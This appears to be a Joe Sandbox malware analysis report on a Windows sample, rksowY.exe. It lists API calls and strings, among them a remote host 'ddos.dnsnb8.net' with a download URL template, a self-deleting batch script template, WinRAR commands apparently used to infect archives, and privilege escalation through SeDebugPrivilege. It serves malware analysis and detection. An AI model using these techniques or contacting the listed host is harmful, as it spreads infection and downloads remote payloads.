                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                                • String ID: C:\Users\user\AppData\Local\Temp\rksowY.exe$SeDebugPrivilege

                                 Control-flow Graph
                                 [Rendered control-flow graph of the function starting at 005B239D (basic blocks 5b239d to 5b268f); executed and not-executed blocks are distinguished in the rendering, which is not reproduced in this text. The API calls made along the graph are listed under APIs below.]
                                APIs
                                • strstr.MSVCRT ref: 005B23CC
                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 005B2464
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 005B2472
                                • CloseHandle.KERNEL32(?,00000000,00000000), ref: 005B24A8
                                • memset.MSVCRT ref: 005B24B9
                                • strrchr.MSVCRT ref: 005B24C9
                                • wsprintfA.USER32 ref: 005B24DE
                                • strrchr.MSVCRT ref: 005B24ED
                                • memset.MSVCRT ref: 005B24F2
                                • memset.MSVCRT ref: 005B2505
                                • wsprintfA.USER32 ref: 005B2524
                                • Sleep.KERNEL32(000007D0), ref: 005B2535
                                • Sleep.KERNEL32(000007D0), ref: 005B255D
                                • memset.MSVCRT ref: 005B256E
                                • wsprintfA.USER32 ref: 005B2585
                                • memset.MSVCRT ref: 005B25A6
                                • wsprintfA.USER32 ref: 005B25CA
                                • Sleep.KERNEL32(000007D0), ref: 005B25D0
                                • Sleep.KERNEL32(000007D0,?,?), ref: 005B25E5
                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 005B25FC
                                • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 005B2611
                                • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 005B2642
                                • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 005B265B
                                • SetEndOfFile.KERNEL32 ref: 005B266D
                                • CloseHandle.KERNEL32(00000000), ref: 005B2676
                                • RemoveDirectoryA.KERNEL32(?), ref: 005B2681
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                 • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                                • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                                APIs
                                • memset.MSVCRT ref: 005B2766
                                • memset.MSVCRT ref: 005B2774
                                • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 005B2787
                                • wsprintfA.USER32 ref: 005B27AB
                                  • Part of subcall function 005B185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76938400,http://%s:%d/%s/%s,?,?,?,005B1118), ref: 005B1867
                                  • Part of subcall function 005B185B: srand.MSVCRT ref: 005B1878
                                  • Part of subcall function 005B185B: rand.MSVCRT ref: 005B1880
                                  • Part of subcall function 005B185B: srand.MSVCRT ref: 005B1890
                                  • Part of subcall function 005B185B: rand.MSVCRT ref: 005B1894
                                • wsprintfA.USER32 ref: 005B27C6
                                • CopyFileA.KERNEL32(?,005B4C80,00000000), ref: 005B27D4
                                • wsprintfA.USER32 ref: 005B27F4
                                  • Part of subcall function 005B1973: PathFileExistsA.SHLWAPI(\N[`N[,00000000,C:\Users\user\AppData\Local\Temp\rksowY.exe), ref: 005B1992
                                  • Part of subcall function 005B1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 005B19BA
                                  • Part of subcall function 005B1973: Sleep.KERNEL32(00000064), ref: 005B19C6
                                  • Part of subcall function 005B1973: wsprintfA.USER32 ref: 005B19EC
                                  • Part of subcall function 005B1973: CopyFileA.KERNEL32(?,?,00000000), ref: 005B1A00
                                  • Part of subcall function 005B1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005B1A1E
                                  • Part of subcall function 005B1973: GetFileSize.KERNEL32(?,00000000), ref: 005B1A2C
                                  • Part of subcall function 005B1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 005B1A46
                                  • Part of subcall function 005B1973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 005B1A65
                                • DeleteFileA.KERNEL32(?,?,005B4E54,005B4E58), ref: 005B281A
                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,005B4E54,005B4E58), ref: 005B2832
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                 • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                                • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                                APIs
                                  • Part of subcall function 005B185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76938400,http://%s:%d/%s/%s,?,?,?,005B1118), ref: 005B1867
                                  • Part of subcall function 005B185B: srand.MSVCRT ref: 005B1878
                                  • Part of subcall function 005B185B: rand.MSVCRT ref: 005B1880
                                  • Part of subcall function 005B185B: srand.MSVCRT ref: 005B1890
                                  • Part of subcall function 005B185B: rand.MSVCRT ref: 005B1894
                                • wsprintfA.USER32 ref: 005B15AA
                                • wsprintfA.USER32 ref: 005B15C6
                                • lstrlen.KERNEL32(?), ref: 005B15D2
                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 005B15EE
                                • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 005B1609
                                • CloseHandle.KERNEL32(00000000), ref: 005B1612
                                • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 005B162D
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                 • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                                • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\rksowY.exe$open
                                APIs
                                • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,005B1400), ref: 005B1226
                                • GetProcAddress.KERNEL32(00000000), ref: 005B122D
                                • GetCurrentProcessId.KERNEL32(?,?,?,?,005B1400), ref: 005B123F
                                • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,005B1400), ref: 005B1250
                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\rksowY.exe,?,?,?,?,005B1400), ref: 005B129E
                                • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\rksowY.exe,?,?,?,?,005B1400), ref: 005B12B0
                                • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\rksowY.exe,?,?,?,?,005B1400), ref: 005B12F5
                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,005B1400), ref: 005B130A
                                Strings
                                • ntdll.dll, xrefs: 005B1219
                                • C:\Users\user\AppData\Local\Temp\rksowY.exe, xrefs: 005B1262
                                • ZwQuerySystemInformation, xrefs: 005B1212
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                 • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                                • String ID: C:\Users\user\AppData\Local\Temp\rksowY.exe$ZwQuerySystemInformation$ntdll.dll
                                APIs
                                • memset.MSVCRT ref: 005B18B1
                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,76230F00,76938400), ref: 005B18D3
                                • CloseHandle.KERNEL32(I%[), ref: 005B18E9
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005B18F0
                                • GetExitCodeProcess.KERNEL32(?,?), ref: 005B1901
                                • CloseHandle.KERNEL32(?), ref: 005B190A
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                 • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                                • String ID: I%[
                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76938400,http://%s:%d/%s/%s,?,?,?,005B1118), ref: 005B1867
                                • srand.MSVCRT ref: 005B1878
                                • rand.MSVCRT ref: 005B1880
                                • srand.MSVCRT ref: 005B1890
                                • rand.MSVCRT ref: 005B1894
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                 • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: Timerandsrand$FileSystem
                                • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7622E800,?,?,005B29DB,?,00000001), ref: 005B26A7
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,7622E800,?,?,005B29DB,?,00000001), ref: 005B26B5
                                • lstrlen.KERNEL32(?), ref: 005B26C4
                                • ??2@YAPAXI@Z.MSVCRT ref: 005B26CE
                                • lstrcpy.KERNEL32(00000004,?), ref: 005B26E3
                                • lstrcpy.KERNEL32(?,00000004), ref: 005B271F
                                • ??3@YAXPAX@Z.MSVCRT ref: 005B272D
                                • SetEvent.KERNEL32 ref: 005B273C
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                 • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                                Strings
                                • pICqreLktfNAPXATguYKaQGFwazsqYEbzivUJMRmSxkPuBOEdZRJtWndvwRgNpjNOXhjTkYMcDhXMJazQKyAmWywfqnrotsVBmnieKDSceGUuiZfbbVQxgCPpojhWdclFTUFSGIBxHIvZLDoLylClEOHrHsV, xrefs: 005B1B8A, 005B1B9C, 005B1C15, 005B1C49
                                • .exe, xrefs: 005B1C57
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                 • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: lstrcatmemcpymemsetrandsrand
                                • String ID: .exe$pICqreLktfNAPXATguYKaQGFwazsqYEbzivUJMRmSxkPuBOEdZRJtWndvwRgNpjNOXhjTkYMcDhXMJazQKyAmWywfqnrotsVBmnieKDSceGUuiZfbbVQxgCPpojhWdclFTUFSGIBxHIvZLDoLylClEOHrHsV
                                APIs
                                • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 005B1334
                                • GetProcAddress.KERNEL32(00000000), ref: 005B133B
                                • memset.MSVCRT ref: 005B1359
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                 • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProcmemset
                                • String ID: NtSystemDebugControl$ntdll.dll
                                Memory Dump Source
                                • Source File: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                 • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: strrchr$lstrcmpilstrcpylstrlen
                                • String ID:
                                • API String ID: 3636361484-0
                                • Opcode ID: b00a9d92a5a18ebe49251edc95eaf98f5dc48b5a71df7f8a351cb189eb7a1688
                                • Instruction ID: ec055d6232fafc83942a6d9c118ed70c180c4a20d0bc1385cf6fc60b6b45a01b
                                • Opcode Fuzzy Hash: b00a9d92a5a18ebe49251edc95eaf98f5dc48b5a71df7f8a351cb189eb7a1688
                                • Instruction Fuzzy Hash: AC01FE729046196FDF606760DC4DBD67FDCFF14310F440065D945E3090D674FA888BA4
                                APIs
                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 005B603C
                                • GetProcAddress.KERNEL32(00000000,005B6064), ref: 005B604F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2237894642.00000000005B6000.00000040.00000001.01000000.00000005.sdmp, Offset: 005B0000, based on PE: true
                                • Associated: 00000002.00000002.2234467421.00000000005B0000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2235537464.00000000005B1000.00000020.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp
                                • Associated: 00000002.00000002.2237497442.00000000005B4000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_5b0000_rksowY.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: kernel32.dll
                                • API String ID: 1646373207-1793498882
                                • Opcode ID: 07897bd8fffc32d902e34b5cb51a3fbf165b456ea5825e00ad690aa181e93c0f
                                • Instruction ID: 028c4afa6490b74f0d86a60b2f3f675bf97106ab9342adfd604b8436f3b75105
                                • Opcode Fuzzy Hash: 07897bd8fffc32d902e34b5cb51a3fbf165b456ea5825e00ad690aa181e93c0f
                                • Instruction Fuzzy Hash: C6F0F6B11442898FEF708E64CC84BDE3BE4FB05700F50042AE909CB241CB3896058B14